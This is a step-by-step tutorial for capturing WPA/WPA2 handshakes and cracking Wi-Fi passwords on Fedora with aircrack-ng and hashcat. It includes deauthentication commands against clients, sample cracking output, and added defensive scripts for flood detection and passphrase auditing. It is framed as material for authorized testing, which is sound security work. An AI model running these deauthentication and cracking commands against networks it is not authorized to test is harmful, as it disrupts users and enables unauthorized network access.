Cracking WPA/WPA2 with Aircrack-ng on Fedora

This guide covers testing WPA/WPA2 network security using the Aircrack-ng suite on Fedora Linux. We'll capture the four-way handshake and perform dictionary attacks to recover the pre-shared key.

Legal Disclaimer: Only perform these techniques on networks you own or have explicit written permission to test. Unauthorized access to computer networks is illegal and can result in criminal prosecution. This guide is for educational and authorized penetration testing purposes only.

How WPA/WPA2 Cracking Works

WPA/WPA2 uses a robust encryption scheme that cannot be broken through statistical analysis like WEP. The only viable attack is:

  1. Capture the four-way handshake between a client and access point
  2. Perform a dictionary attack, testing each candidate password from a wordlist against the captured handshake

The handshake occurs when a client connects to the network. If no clients are actively connecting, we can force a reconnection by sending deauthentication frames.

Key limitation: This attack only succeeds if the password exists in your wordlist.

Note: This technique does not work against WPA3, which uses Simultaneous Authentication of Equals (SAE) and is immune to offline dictionary attacks.

Prerequisites

Hardware Requirements

You need a wireless adapter that supports:

  • Monitor mode – Passive packet capture
  • Packet injection – Sending raw 802.11 frames

Recommended adapters:

  • Alfa AWUS036ACH (dual-band, 802.11ac)
  • Alfa AWUS036ACHM (dual-band, newer chipset)
  • Alfa AWUS1900 (high power, quad-antenna)
  • TP-Link TL-WN722N v1 (budget option, Atheros chipset)

Note: Many built-in laptop wireless cards don't support monitor mode or injection. Check the Aircrack-ng compatibility list for your chipset.

Install Aircrack-ng

Unlike Kali Linux, where it's pre-installed, Fedora requires manual installation:

sudo dnf install aircrack-ng

Verify installation:

aircrack-ng --version

You should see output like:

Aircrack-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe

Optional: Install Hashcat for GPU Cracking

For faster password cracking with GPU acceleration:

sudo dnf install hashcat

Note: For GPU acceleration, you'll need appropriate OpenCL drivers installed. AMD users need rocm-opencl or mesa-libOpenCL; NVIDIA users need xorg-x11-drv-nvidia-cuda. Without GPU drivers, hashcat falls back to CPU mode.

Download a Wordlist

Fedora doesn't include wordlists by default. Download the famous rockyou.txt:

# Create a wordlists directory
mkdir -p ~/wordlists

# Download rockyou.txt (134MB, ~14 million passwords)
curl -L -o ~/wordlists/rockyou.txt \
  https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Verify the download:

wc -l ~/wordlists/rockyou.txt
# Should show approximately 14,341,564 lines

Step 1: Identify Your Wireless Interface

List your network interfaces:

iwconfig

Look for your wireless adapter (typically wlan0 or wlp3s0):

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated
          ...

Note the interface name—we'll use wlan0 throughout this guide.

You can also use:

ip link show

Step 2: Stop NetworkManager

NetworkManager can interfere with monitor mode by changing channels or resetting the interface. Stop it first:

sudo systemctl stop NetworkManager

Note: Your regular network connection will stop working until you restart NetworkManager.

Alternatively, use airmon-ng to kill all interfering processes:

sudo airmon-ng check kill

This stops processes like:

  • NetworkManager
  • wpa_supplicant
  • dhclient

Step 3: Enable Monitor Mode

Put your wireless adapter into monitor mode:

sudo airmon-ng start wlan0

Output:

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros AR9271

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Your interface is now wlan0mon (monitor mode). Verify with:

iwconfig wlan0mon

You should see Mode:Monitor.

Alternative: Manual Monitor Mode

If airmon-ng doesn't work, enable monitor mode manually:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

To verify:

iw dev wlan0 info
# Should show "type monitor"

Step 4: Scan for Target Networks

Start scanning for nearby wireless networks:

sudo airodump-ng wlan0mon

You'll see a live display:

 CH  9 ][ Elapsed: 1 min ][ 2026-01-09 16:45

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:14:6C:7E:40:80  -67      234      1245   12   6   54e  WPA2 CCMP   PSK  HomeNetwork
 A0:B1:C2:D3:E4:F5  -72       89       456    3  11   54e  WPA2 CCMP   PSK  CoffeeShop

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2  -45    54e-54      0      892
 00:14:6C:7E:40:80  48:A9:1C:3D:2E:8F  -52    54e-54      0      234

Top section: Access points
Bottom section: Connected clients

Note down for your target:

  • BSSID: 00:14:6C:7E:40:80 (AP's MAC address)
  • CH: 6 (channel)
  • ESSID: HomeNetwork (network name)
  • Client MAC: 00:0F:B5:FD:FB:C2 (for targeted deauth)

Press Ctrl+C to stop scanning.

Step 5: Capture the Handshake

Focus on your target network and start capturing:

sudo airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w capture wlan0mon

Parameters:

  • -c 6 — Lock to channel 6
  • --bssid 00:14:6C:7E:40:80 — Filter by target AP
  • -w capture — Output file prefix
  • wlan0mon — Monitor interface

Leave this running in the terminal. It will create files like capture-01.cap.

Step 6: Force a Handshake (Deauthentication)

Open a new terminal and send deauthentication frames to force clients to reconnect:

Option A: Deauth All Clients (Broadcast)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 wlan0mon

Option B: Deauth Specific Client (More Reliable)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon

Parameters:

  • -0 5 — Deauthentication mode, send 5 packets
  • -a — Target AP's BSSID
  • -c — Target client's MAC (optional but more effective)

Output:

16:48:23  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 6
16:48:23  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
16:48:24  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
...
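
Seen from the defending side, the burst in the output above is easy to recognise. The following added example (not part of the original guide) flags it in a stream of frame records; the comma-separated record format, the 5-second window and the 30-frame threshold are assumptions chosen for illustration, and the sample records are constructed.

```python
from collections import defaultdict, deque

DEAUTH = 12                      # 802.11 management-frame subtype: deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP, STA, OTHER = "00:14:6c:7e:40:80", "00:0f:b5:fd:fb:c2", "48:a9:1c:3d:2e:8f"

def sample_frames():
    """Constructed records: epoch,subtype,source,destination,bssid,reason."""
    rows = [f"1000.0,8,{AP},{BROADCAST},{AP},0"]            # beacon, ignored
    rows.append(f"1001.0,{DEAUTH},{OTHER},{AP},{AP},3")     # one client leaving normally
    # Burst shaped like the aireplay-ng output above: 64 frames, reason 7, about 1 s
    rows += [f"{1010 + i / 64:.3f},{DEAUTH},{AP},{STA},{AP},7" for i in range(64)]
    return rows

def detect_deauth_floods(lines, window=5.0, threshold=30):
    """Flag (bssid, station) pairs with >= threshold deauth frames inside `window` seconds."""
    recent = defaultdict(deque)          # (bssid, station) -> timestamps still in the window
    alerts = {}
    for line in lines:
        ts, subtype, src, dst, bssid, reason = line.strip().lower().split(",")
        if int(subtype) != DEAUTH:
            continue
        ts = float(ts)
        station = dst if src == bssid else src    # the end that is not the AP
        seen = recent[(bssid, station)]
        seen.append(ts)
        while ts - seen[0] > window:              # slide the window forward
            seen.popleft()
        if len(seen) >= threshold:
            alert = alerts.setdefault((bssid, station),
                                      {"first_seen": ts, "peak": 0, "reasons": set()})
            alert["peak"] = max(alert["peak"], len(seen))
            alert["reasons"].add(int(reason))
            alert["broadcast"] = station == BROADCAST
    return alerts

if __name__ == "__main__":
    for (bssid, station), a in detect_deauth_floods(sample_frames()).items():
        print(f"deauth flood on {bssid} -> {station}: peak {a['peak']} frames "
              f"in window, reason codes {sorted(a['reasons'])}")
```

Networks that enable 802.11w Protected Management Frames, which WPA3 requires, have clients discard forged deauthentication frames.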

Verify Handshake Capture

Watch your airodump-ng window. When a handshake is captured, you'll see:

 CH  6 ][ Elapsed: 2 mins ][ 2026-01-09 16:50 ][ WPA handshake: 00:14:6C:7E:40:80

The WPA handshake: [BSSID] message confirms success. You can now stop airodump-ng with Ctrl+C.

Step 7: Crack the Password

Using Aircrack-ng (CPU-based)

aircrack-ng -w ~/wordlists/rockyou.txt -b 00:14:6C:7E:40:80 capture-01.cap

Parameters:

  • -w — Path to wordlist
  • -b — Target BSSID
  • Last argument — Capture file

Successful Output

                               Aircrack-ng 1.7

      [00:05:23] 1823741/14344392 keys tested (5765.32 k/s)

      Time left: 36 minutes, 12 seconds                      12.71%

                          KEY FOUND! [ SuperSecret123 ]

      Master Key     : A1 B2 C3 D4 E5 F6 77 88 99 AA BB CC DD EE FF 00
                       11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF 00

      Transient Key  : 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
                       ...

      EAPOL HMAC     : AB CD EF 01 23 45 67 89 AB CD EF 01 23 45 67 89

The password is SuperSecret123.

Failed Attempt

If the password isn't in your wordlist:

                               Aircrack-ng 1.7

      [00:42:17] 14344392/14344392 keys tested (5612.43 k/s)

      Time left: 0 seconds                                  100.00%

      KEY NOT FOUND

      Passphrase not in dictionary

Try a different or larger wordlist, or use hashcat for GPU-accelerated cracking.

Step 8: GPU-Accelerated Cracking with Hashcat

For faster cracking, convert the capture and use hashcat:

# Install hcxtools if not already installed
sudo dnf install hcxtools

# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap

# Crack with hashcat (GPU-accelerated)
hashcat -m 22000 hash.hc22000 ~/wordlists/rockyou.txt

Performance comparison:

  • Aircrack-ng (CPU): ~5,000 keys/second
  • Hashcat (GPU): ~400,000+ keys/second
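
These rates, together with the key limitation that the password must be in the wordlist, are what a network owner needs to audit their own passphrase. The following added example (not part of the original guide) shows the key derivation each guess has to repeat and checks a passphrase against a wordlist; the function names, the 62-character alphabet for the random-passphrase estimate and the tiny sample wordlist are assumptions, and the sample data is constructed.

```python
import hashlib

RATES = {"aircrack-ng (CPU)": 5_000, "hashcat (GPU)": 400_000}  # keys/s quoted above
YEAR = 365 * 24 * 3600
# Constructed stand-in for ~/wordlists/rockyou.txt (open the real file with "rb")
SAMPLE = [b"123456\n", b"password\n", b"iloveyou\n", b"SuperSecret123\n"]

def derive_pmk(passphrase, ssid):
    """Cost of one guess: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32-byte PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def wordlist_position(passphrase, lines):
    """1-based line number of the passphrase in an iterable of byte lines, else None.
    Bytes are compared because rockyou.txt contains entries that are not valid UTF-8."""
    target = passphrase.encode()
    for number, line in enumerate(lines, 1):
        if line.rstrip(b"\r\n") == target:
            return number
    return None

def audit(passphrase, lines, alphabet=62):
    """Report how a dictionary attack at the quoted rates fares against this passphrase."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA/WPA2 passphrase is 8 to 63 characters long")
    position = wordlist_position(passphrase, lines)
    report = {"in_wordlist": position is not None, "position": position}
    if position is not None:
        # Listed passphrase: found as soon as the attack reaches that line
        report["seconds_to_reach"] = {t: position / r for t, r in RATES.items()}
    else:
        # Assumption: passphrase is random over `alphabet` symbols, full keyspace searched
        keyspace = alphabet ** len(passphrase)
        report["exhaustive_years"] = {t: keyspace / r / YEAR for t, r in RATES.items()}
    return report

if __name__ == "__main__":
    # Same passphrase, different SSID: the PMK differs because the SSID is the salt
    print(derive_pmk("SuperSecret123", "HomeNetwork").hex())
    print(derive_pmk("SuperSecret123", "CoffeeShop").hex())
    print(audit("SuperSecret123", SAMPLE))
    print(audit("k7Qm2vXp9LrT", SAMPLE))   # constructed random 12-character passphrase
```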

Step 9: Restore Normal Networking

When you're done, disable monitor mode and restore network services:

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart NetworkManager
sudo systemctl start NetworkManager

If you used manual monitor mode, revert to managed mode:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
sudo systemctl start NetworkManager

Quick Reference

Step                          Command
Install aircrack-ng           sudo dnf install aircrack-ng
Stop NetworkManager           sudo systemctl stop NetworkManager
Kill interfering processes    sudo airmon-ng check kill
Enable monitor mode           sudo airmon-ng start wlan0
Scan networks                 sudo airodump-ng wlan0mon
Capture handshake             sudo airodump-ng -c [CH] --bssid [MAC] -w capture wlan0mon
Deauthenticate clients        sudo aireplay-ng -0 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0mon
Crack password                aircrack-ng -w wordlist.txt capture-01.cap
Disable monitor mode          sudo airmon-ng stop wlan0mon
Restore networking            sudo systemctl start NetworkManager

Troubleshooting

"No handshake captured"

  • Ensure clients are connected to the target network
  • Get physically closer to the AP and clients
  • Try deauthenticating specific clients instead of broadcast
  • Verify you're on the correct channel
  • Some clients may not reconnect automatically—be patient

"Interface doesn't support monitor mode"

  • Check if your adapter is compatible with aircrack-ng
  • Try updating your kernel and drivers: sudo dnf upgrade
  • Some drivers need additional firmware: sudo dnf install linux-firmware
  • Consider purchasing a compatible USB adapter

"Passphrase not in dictionary"

  • Try larger wordlists
  • Use rule-based attacks with hashcat
  • Create custom wordlists based on target information

"Channel hopping" or unstable capture

  • Make sure you killed all interfering processes
  • Verify NetworkManager is stopped: systemctl status NetworkManager
  • Lock to the target channel with -c

airmon-ng not creating monitor interface

Try the manual method:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

Fedora vs Kali: Key Differences

Aspect           Fedora                         Kali Linux
Aircrack-ng      dnf install aircrack-ng        Pre-installed
Wordlists        Manual download required       rockyou.txt included
Purpose          General-purpose OS             Penetration testing focused
Default tools    Minimal security tools         Full security toolkit

Fedora works well for wireless security testing, but requires more setup than Kali. If you do this frequently, consider using Kali Linux or creating a dedicated Fedora security toolkit.

References

Wordlists:

  • rockyou.txt – Classic password list (~14M passwords)
  • SecLists – Comprehensive security wordlists